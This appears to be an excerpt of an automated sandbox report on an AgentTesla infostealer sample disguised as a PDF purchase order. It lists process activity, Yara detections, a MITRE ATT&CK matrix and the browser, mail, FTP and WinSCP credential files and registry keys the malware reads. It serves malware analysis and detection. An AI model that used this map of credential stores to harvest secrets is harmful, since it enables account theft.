                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeQueries volume information: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeQueries volume information: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeQueries volume information: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3860883657.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1620262791.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3861351736.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3860883657.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3860059633.00000000033EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1620262791.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3860059633.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 8096, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: FrFvspxoHsPs.exe PID: 764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 3236, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 4216, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3860883657.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1620262791.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3860059633.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 8096, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: FrFvspxoHsPs.exe PID: 764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 3236, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 4216, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3861351736.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3860883657.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1620262791.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000018.00000002.3861351736.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3860883657.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3860059633.00000000033EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.1620262791.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3860059633.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 7644, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: z38PO_20248099-1_pdf.exe PID: 8096, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: FrFvspxoHsPs.exe PID: 764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 3236, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 4216, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		1
                    Exfiltration Over Alternative Protocol                    		Abuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
